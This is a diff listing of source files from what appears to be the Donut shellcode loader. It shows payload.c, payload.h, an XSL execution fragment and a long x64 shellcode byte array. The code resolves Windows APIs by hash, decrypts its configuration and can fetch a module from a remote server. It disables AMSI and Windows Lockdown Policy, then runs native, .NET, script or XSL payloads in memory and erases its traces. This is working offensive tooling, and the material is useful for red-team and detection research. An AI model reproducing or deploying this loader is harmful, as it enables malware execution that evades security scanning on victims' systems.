76 // 5. load XSL file
77 DPRINT("IXMLDOMDocument::loadXML");
78 hr = pDoc->lpVtbl->loadXML(pDoc, (BSTR)xsl_str, &loaded);
79 DPRINT("HRESULT: %08lx loaded : %s",
80 hr, loaded ? "TRUE" : "FALSE");
81
82 if(hr == S_OK && loaded) {
83 // 6. query node interface
84 DPRINT("IXMLDOMDocument::QueryInterface");
85 hr = pDoc->lpVtbl->QueryInterface(
86 pDoc, &inst->xIID_IXMLDOMNode, (void **)&pNode);
87
88 if(hr == S_OK) {
89 DPRINT("HRESULT: %08lx", hr);
90 // 7. execute script
91 DPRINT("IXMLDOMDocument::transformNode");
92 hr = pDoc->lpVtbl->transformNode(pDoc, pNode, &res);
93 DPRINT("HRESULT: %08lx", hr);
94 pNode->lpVtbl->Release(pNode);
95 }
96 }
97 pDoc->lpVtbl->Release(pDoc);
98 }
99 DPRINT("CoUninitialize");
100 inst->api.CoUninitialize();
101 }
102 DPRINT("Erasing XSL from memory.");
103 Memset(xsl_str, 0, (inst->mod_len + 1) * sizeof(WCHAR));
104
105 DPRINT("VirtualFree()");
106 inst->api.VirtualFree(xsl_str, 0, MEM_RELEASE | MEM_DECOMMIT);
107 }
108 }
+0
-1
payload/order.txt less more
0 ThreadProc
+0
-267
payload/payload.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "payload.h"
32
33 DWORD ThreadProc(LPVOID lpParameter) {
34 ULONG i, ofs;
35 ULONG64 sig;
36 PDONUT_INSTANCE inst = (PDONUT_INSTANCE)lpParameter;
37 DONUT_ASSEMBLY assembly;
38 PDONUT_MODULE mod;
39 VirtualAlloc_t _VirtualAlloc;
40 VirtualFree_t _VirtualFree;
41 LPVOID pv;
42 ULONG64 hash;
43 BOOL disabled;
44
45 DPRINT("Maru IV : %" PRIX64, inst->iv);
46
47 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualAlloc) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
48 DPRINT("Resolving address for VirtualAlloc() : %" PRIX64, hash);
49 _VirtualAlloc = (VirtualAlloc_t)xGetProcAddress(inst, hash, inst->iv);
50
51 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualFree) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
52 DPRINT("Resolving address for VirtualAlloc() : %" PRIX64, hash);
53 _VirtualFree = (VirtualFree_t) xGetProcAddress(inst, hash, inst->iv);
54
55 if(_VirtualAlloc == NULL || _VirtualFree == NULL) {
56 DPRINT("FAILED!.");
57 return -1;
58 }
59
60 DPRINT("VirtualAlloc : %p VirtualFree : %p",
61 (LPVOID)_VirtualAlloc, (LPVOID)_VirtualFree);
62
63 DPRINT("Allocating %i bytes of RW memory", inst->len);
64 pv = _VirtualAlloc(NULL, inst->len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
65
66 if(pv == NULL) {
67 DPRINT("Memory allocation failed...");
68 return -1;
69 }
70 DPRINT("Copying %i bytes of data to memory %p", inst->len, pv);
71 Memcpy(pv, lpParameter, inst->len);
72 inst = (PDONUT_INSTANCE)pv;
73
74 DPRINT("Zero initializing PDONUT_ASSEMBLY");
75 Memset(&assembly, 0, sizeof(assembly));
76
77 #if !defined(NOCRYPTO)
78 PBYTE inst_data;
79 // load pointer to data just past len + key
80 inst_data = (PBYTE)inst + offsetof(DONUT_INSTANCE, api_cnt);
81
82 DPRINT("Decrypting %li bytes of instance", inst->len);
83
84 donut_decrypt(inst->key.mk,
85 inst->key.ctr,
86 inst_data,
87 inst->len - offsetof(DONUT_INSTANCE, api_cnt));
88
89 DPRINT("Generating hash to verify decryption");
90 ULONG64 mac = maru(inst->sig, inst->iv);
91 DPRINT("Instance : %016llx | Result : %016llx", inst->mac, mac);
92
93 if(mac != inst->mac) {
94 DPRINT("Decryption of instance failed");
95 goto erase_memory;
96 }
97 #endif
98 DPRINT("Resolving LoadLibraryA");
99
100 inst->api.addr[0] = xGetProcAddress(inst, inst->api.hash[0], inst->iv);
101 if(inst->api.addr[0] == NULL) return -1;
102
103 for(i=0; i<inst->dll_cnt; i++) {
104 DPRINT("Loading %s ...", inst->dll_name[i]);
105 inst->api.LoadLibraryA(inst->dll_name[i]);
106 }
107
108 DPRINT("Resolving %i API", inst->api_cnt);
109
110 for(i=1; i<inst->api_cnt; i++) {
111 DPRINT("Resolving API address for %016llX", inst->api.hash[i]);
112
113 inst->api.addr[i] = xGetProcAddress(inst, inst->api.hash[i], inst->iv);
114
115 if(inst->api.addr[i] == NULL) {
116 DPRINT("Failed to resolve API");
117 goto erase_memory;
118 }
119 }
120
121 if(inst->type == DONUT_INSTANCE_URL) {
122 DPRINT("Instance is URL");
123 if(!DownloadModule(inst)) goto erase_memory;
124 }
125
126 if(inst->type == DONUT_INSTANCE_PIC) {
127 DPRINT("Using module embedded in instance");
128 mod = (PDONUT_MODULE)&inst->module.x;
129 } else {
130 DPRINT("Loading module from allocated memory");
131 mod = inst->module.p;
132 }
133
134 // try bypassing AMSI and WLDP?
135 if(inst->bypass != DONUT_BYPASS_SKIP) {
136 // Try to disable AMSI
137 disabled = DisableAMSI(inst);
138 DPRINT("DisableAMSI %s", disabled ? "OK" : "FAILED");
139 if(!disabled && inst->bypass == DONUT_BYPASS_ABORT)
140 goto erase_memory;
141
142 // Try to disable WLDP
143 disabled = DisableWLDP(inst);
144 DPRINT("DisableWLDP %s", disabled ? "OK" : "FAILED");
145 if(!disabled && inst->bypass == DONUT_BYPASS_ABORT)
146 goto erase_memory;
147 }
148
149 // unmanaged EXE/DLL?
150 if(mod->type == DONUT_MODULE_DLL ||
151 mod->type == DONUT_MODULE_EXE) {
152 RunPE(inst);
153 } else
154 // .NET EXE/DLL?
155 if(mod->type == DONUT_MODULE_NET_DLL ||
156 mod->type == DONUT_MODULE_NET_EXE)
157 {
158 if(LoadAssembly(inst, &assembly)) {
159 RunAssembly(inst, &assembly);
160 }
161 FreeAssembly(inst, &assembly);
162 } else
163 // vbs or js?
164 if(mod->type == DONUT_MODULE_VBS ||
165 mod->type == DONUT_MODULE_JS)
166 {
167 RunScript(inst);
168 } else
169 // xsl?
170 if(mod->type == DONUT_MODULE_XSL) {
171 RunXSL(inst);
172 }
173
174 erase_memory:
175 // if module was downloaded
176 if(inst->type == DONUT_INSTANCE_URL) {
177 if(inst->module.p != NULL) {
178 // overwrite memory with zeros
179 Memset(inst->module.p, 0, (DWORD)inst->mod_len);
180
181 // free memory
182 inst->api.VirtualFree(inst->module.p, 0, MEM_RELEASE | MEM_DECOMMIT);
183 inst->module.p = NULL;
184 }
185 }
186
187 DPRINT("Erasing RW memory for instance");
188 Memset(inst, 0, inst->len);
189
190 DPRINT("Releasing RW memory for instance");
191 _VirtualFree(inst, 0, MEM_DECOMMIT | MEM_RELEASE);
192
193 return 0;
194 }
195
196 #include "http_client.c" // For downloading module
197
198 #include "inmem_dotnet.c" // .NET assemblies
199 #include "inmem_pe.c" // Unmanaged PE/DLL files
200 #include "inmem_xsl.c" // XSL files
201 #include "inmem_script.c" // VBS/JS files
202
203 #include "peb.c" // resolve functions in export table
204
205 #include "bypass.c" // Bypass AMSI and WLDP
206 #include "getpc.c" // code stub to return program counter (always at the end!)
207
208 // the following code is *only* for development purposes
209 // given an instance file, it will run as if running on a target system
210 // attach a debugger to host process
211 #ifdef DEBUG
212
213 #include <stdio.h>
214 #include <string.h>
215 #include <stdlib.h>
216 #include <sys/stat.h>
217
218 int main(int argc, char *argv[]) {
219 FILE *fd;
220 struct stat fs;
221 PDONUT_INSTANCE inst;
222 DWORD old;
223
224 if(argc != 2) {
225 printf(" [ usage: payload <instance>\n");
226 return 0;
227 }
228 // get size of instance
229 if(stat(argv[1], &fs) != 0) {
230 printf(" [ unable to obtain size of instance.\n");
231 return 0;
232 }
233
234 // zero size?
235 if(fs.st_size == 0) {
236 printf(" [ invalid instance.\n");
237 return 0;
238 }
239
240 // try open for reading
241 fd = fopen(argv[1], "rb");
242 if(fd == NULL) {
243 printf(" [ unable to open %s.\n", argv[1]);
244 return 0;
245 }
246
247 // allocate memory
248 inst = (PDONUT_INSTANCE)VirtualAlloc(NULL, fs.st_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
249
250 if(inst != NULL) {
251 fread(inst, 1, fs.st_size, fd);
252
253 // change protection to PAGE_EXECUTE_READ
254 if(VirtualProtect((LPVOID)inst, fs.st_size, PAGE_EXECUTE_READ, &old)) {
255 printf("Running...");
256
257 // run payload with instance
258 ThreadProc(inst);
259 }
260 // deallocate
261 VirtualFree((LPVOID)inst, 0, MEM_DECOMMIT | MEM_RELEASE);
262 }
263 fclose(fd);
264 return 0;
265 }
266 #endif
+0
-145
payload/payload.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef PAYLOAD_H
32 #define PAYLOAD_H
33
34 #if !defined(_MSC_VER)
35 #define __out_ecount_full(x)
36 #define __out_ecount_full_opt(x)
37 #include <inttypes.h>
38 #endif
39
40 #include <windows.h>
41 #include <wincrypt.h>
42 #include <oleauto.h>
43 #include <objbase.h>
44 #include <wininet.h>
45
46 #pragma comment(lib, "wininet.lib")
47 #pragma comment(lib, "advapi32.lib")
48 #pragma comment(lib, "crypt32.lib")
49
50 #if defined(DEBUG)
51 #include <stdio.h>
52 #include <string.h>
53
54 #define __FILENAME__ (strrchr(__FILE__, '\\') ? strrchr(__FILE__, '\\') + 1 : __FILE__)
55
56 #define DPRINT(...) { \
57 fprintf(stderr, "\nDEBUG: %s:%d:%s(): ", __FILENAME__, __LINE__, __FUNCTION__); \
58 fprintf(stderr, __VA_ARGS__); \
59 }
60 #else
61 #define DPRINT(...) // Don't do anything in release builds
62 #endif
63
64 #define STATIC_KEY ((__TIME__[7] - '0') * 1 + (__TIME__[6] - '0') * 10 + \
65 (__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 + \
66 (__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000)
67
68 // Relative Virtual Address to Virtual Address
69 #define RVA2VA(type, base, rva) (type)((ULONG_PTR) base + rva)
70
71 #if defined(_M_IX86) || defined(__i386__)
72 // return pointer to code in memory
73 char *get_pc(void);
74
75 // PC-relative addressing for x86 code. Similar to RVA2VA except using functions in payload
76 #define ADR(type, addr) (type)(get_pc() - ((ULONG_PTR)&get_pc - (ULONG_PTR)addr))
77 #else
78 #define ADR(type, addr) (type)(addr) // do nothing on 64-bit
79 #endif
80
81 void *Memset(void *ptr, int value, size_t num);
82 void *Memcpy(void *destination, const void *source, size_t num);
83 int Memcmp(const void *ptr1, const void *ptr2, size_t num);
84
85 #if !defined(_MSC_VER)
86 #define memcmp(x,y,z) Memcmp(x,y,z)
87 #endif
88
89 #include "peb.h" // Process Environment Block
90 #include "winapi.h" // Prototypes
91 #include "clr.h" // Common Language Runtime Interface
92
93 #include "donut.h"
94
95 #include "amsi.h" // Anti-malware Scan Interface
96 #include "activescript.h" // Interfaces for executing VBS/JS files
97 #include "wscript.h" // Interfaces to support WScript object
98
99 typedef struct {
100 IActiveScriptSite site;
101 IActiveScriptSiteWindow siteWnd;
102 IHost wscript;
103 HANDLE hEvent;
104 PDONUT_INSTANCE inst; //
105 } MyIActiveScriptSite;
106
107 // internal structure
108 typedef struct _DONUT_ASSEMBLY {
109 ICLRMetaHost *icmh;
110 ICLRRuntimeInfo *icri;
111 ICorRuntimeHost *icrh;
112 IUnknown *iu;
113 AppDomain *ad;
114 Assembly *as;
115 Type *type;
116 MethodInfo *mi;
117 } DONUT_ASSEMBLY, *PDONUT_ASSEMBLY;
118
119 // Downloads a module from remote HTTP server into memory
120 BOOL DownloadModule(PDONUT_INSTANCE);
121
122 // .NET DLL/EXE
123 BOOL LoadAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
124 BOOL RunAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
125 VOID FreeAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
126
127 // Extensible Stylesheet Language Transformations
128 VOID RunXSL(PDONUT_INSTANCE);
129
130 // In-Memory execution of native DLL
131 VOID RunPE(PDONUT_INSTANCE);
132
133 // VBS / JS files
134 VOID RunScript(PDONUT_INSTANCE);
135
136 // Disables Antimalware Scan Interface
137 BOOL DisableAMSI(PDONUT_INSTANCE);
138
139 // Disables Windows Lockdown Policy
140 BOOL DisableWLDP(PDONUT_INSTANCE);
141
142 LPVOID xGetProcAddress(PDONUT_INSTANCE, ULONGLONG, ULONGLONG);
143
144 #endif
+0
-1361
payload/payload_exe_x64.h less more
0
1 unsigned char PAYLOAD_EXE_X64[] = {
2 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00, 0x48,
3 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xe8, 0x48,
4 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x89, 0x45, 0xe0, 0x48,
5 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x55, 0xe0, 0x48,
6 0x8b, 0x45, 0xe8, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x7f, 0x34,
7 0x00, 0x00, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b,
8 0x40, 0x50, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b,
9 0x48, 0x28, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xe8, 0x49, 0x89,
10 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x54, 0x34, 0x00, 0x00, 0x48, 0x89, 0x45,
11 0xd0, 0x48, 0x83, 0x7d, 0xd8, 0x00, 0x74, 0x07, 0x48, 0x83, 0x7d, 0xd0,
12 0x00, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0xf5, 0x03, 0x00,
13 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45,
14 0xd8, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00,
15 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xc8,
16 0x48, 0x83, 0x7d, 0xc8, 0x00, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff,
17 0xe9, 0xc1, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89,
18 0xc2, 0x48, 0x8b, 0x45, 0xc8, 0x49, 0x89, 0xd0, 0x48, 0x8b, 0x55, 0x10,
19 0x48, 0x89, 0xc1, 0xe8, 0xf4, 0x38, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xc8,
20 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8d, 0x85, 0x70, 0xff, 0xff, 0xff, 0x41,
21 0xb8, 0x40, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89,
22 0xc1, 0xe8, 0x8a, 0x38, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x05,
23 0x30, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xe8,
24 0x8b, 0x00, 0x89, 0xc0, 0x4c, 0x8d, 0x80, 0xd0, 0xfd, 0xff, 0xff, 0x48,
25 0x8b, 0x45, 0xe8, 0x48, 0x8d, 0x50, 0x14, 0x48, 0x8b, 0x45, 0xe8, 0x48,
26 0x83, 0xc0, 0x04, 0x48, 0x8b, 0x4d, 0xc0, 0x4d, 0x89, 0xc1, 0x49, 0x89,
27 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x36, 0x3d, 0x00, 0x00, 0x48, 0x8b, 0x45,
28 0xe8, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x55, 0xe8, 0x48, 0x8d, 0x8a,
29 0x18, 0x06, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xfd, 0x39, 0x00, 0x00,
30 0x48, 0x89, 0x45, 0xb8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x80, 0x18,
31 0x07, 0x00, 0x00, 0x48, 0x3b, 0x45, 0xb8, 0x0f, 0x85, 0x58, 0x02, 0x00,
32 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x45,
33 0xe8, 0x48, 0x8b, 0x50, 0x30, 0x48, 0x8b, 0x45, 0xe8, 0x49, 0x89, 0xc8,
34 0x48, 0x89, 0xc1, 0xe8, 0x35, 0x33, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48,
35 0x8b, 0x45, 0xe8, 0x48, 0x89, 0x50, 0x30, 0x48, 0x8b, 0x45, 0xe8, 0x48,
36 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff,
37 0xff, 0xe9, 0xd0, 0x02, 0x00, 0x00, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00,
38 0x00, 0xeb, 0x2a, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x30, 0x8b,
39 0x55, 0xfc, 0x48, 0xc1, 0xe2, 0x05, 0x48, 0x8d, 0x8a, 0x30, 0x02, 0x00,
40 0x00, 0x48, 0x8b, 0x55, 0xe8, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2, 0x08,
41 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x83, 0x45, 0xfc, 0x01, 0x48, 0x8b, 0x45,
42 0xe8, 0x8b, 0x80, 0x34, 0x02, 0x00, 0x00, 0x3b, 0x45, 0xfc, 0x77, 0xc7,
43 0xc7, 0x45, 0xfc, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x54, 0x48, 0x8b, 0x45,
44 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc,
45 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b, 0x14, 0xd0, 0x48, 0x8b, 0x45, 0xe8,
46 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0xa2, 0x32, 0x00, 0x00, 0x48,
47 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc, 0x48, 0x83, 0xc2,
48 0x06, 0x48, 0x89, 0x0c, 0xd0, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc,
49 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b, 0x04, 0xd0, 0x48, 0x85, 0xc0, 0x0f,
50 0x84, 0x7f, 0x01, 0x00, 0x00, 0x83, 0x45, 0xfc, 0x01, 0x48, 0x8b, 0x45,
51 0xe8, 0x8b, 0x80, 0x30, 0x02, 0x00, 0x00, 0x3b, 0x45, 0xfc, 0x77, 0x9d,
52 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8,
53 0x02, 0x75, 0x14, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x10,
54 0x02, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x4c, 0x01, 0x00, 0x00, 0x48,
55 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01,
56 0x75, 0x10, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00,
57 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b,
58 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45,
59 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x50,
60 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x09, 0x33, 0x00, 0x00,
61 0x89, 0x45, 0xb4, 0x83, 0x7d, 0xb4, 0x00, 0x75, 0x13, 0x48, 0x8b, 0x45,
62 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84,
63 0xea, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8,
64 0xe8, 0x34, 0x00, 0x00, 0x89, 0x45, 0xb4, 0x83, 0x7d, 0xb4, 0x00, 0x75,
65 0x13, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83,
66 0xf8, 0x02, 0x0f, 0x84, 0xc5, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0,
67 0x8b, 0x00, 0x83, 0xf8, 0x03, 0x74, 0x0b, 0x48, 0x8b, 0x45, 0xf0, 0x8b,
68 0x00, 0x83, 0xf8, 0x04, 0x75, 0x11, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89,
69 0xc1, 0xe8, 0xf0, 0x12, 0x00, 0x00, 0xe9, 0x9f, 0x00, 0x00, 0x00, 0x48,
70 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x0b, 0x48, 0x8b,
71 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x3f, 0x48, 0x8d, 0x95,
72 0x70, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8,
73 0x5f, 0x06, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x13, 0x48, 0x8d, 0x95, 0x70,
74 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x0c,
75 0x0a, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x70, 0xff, 0xff, 0xff, 0x48, 0x8b,
76 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x72, 0x10, 0x00, 0x00, 0xeb, 0x4a,
77 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x05, 0x74, 0x0b, 0x48,
78 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x06, 0x75, 0x0e, 0x48, 0x8b,
79 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x91, 0x1d, 0x00, 0x00, 0xeb, 0x26,
80 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x07, 0x75, 0x1b, 0x48,
81 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x60, 0x1b, 0x00, 0x00, 0xeb,
82 0x0d, 0x90, 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90, 0xeb, 0x04, 0x90, 0xeb,
83 0x01, 0x90, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00,
84 0x83, 0xf8, 0x02, 0x75, 0x67, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x80,
85 0x48, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x57, 0x48, 0x8b, 0x45,
86 0xe8, 0x48, 0x8b, 0x80, 0x40, 0x07, 0x00, 0x00, 0x89, 0xc2, 0x48, 0x8b,
87 0x45, 0xe8, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00, 0x49, 0x89, 0xd0,
88 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x6b, 0x35, 0x00,
89 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x55,
90 0xe8, 0x48, 0x8b, 0x8a, 0x48, 0x07, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0,
91 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45,
92 0xe8, 0x48, 0xc7, 0x80, 0x48, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
93 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xe8,
94 0x49, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8,
95 0x20, 0x35, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x8b, 0x45, 0xd0,
96 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff,
97 0xd0, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc4, 0xb0, 0x00, 0x00,
98 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x00, 0x03, 0x00, 0x00, 0x48,
99 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0x90, 0x02,
100 0x00, 0x00, 0xc7, 0x85, 0x30, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
101 0xc7, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85,
102 0x74, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x78, 0x02,
103 0x00, 0x00, 0x00, 0x02, 0x60, 0x84, 0x48, 0x8d, 0x85, 0xc0, 0x01, 0x00,
104 0x00, 0x41, 0xb8, 0x68, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00,
105 0x48, 0x89, 0xc1, 0xe8, 0xa4, 0x34, 0x00, 0x00, 0xc7, 0x85, 0xc0, 0x01,
106 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xc0, 0x00, 0x00,
107 0x00, 0x48, 0x89, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xc0,
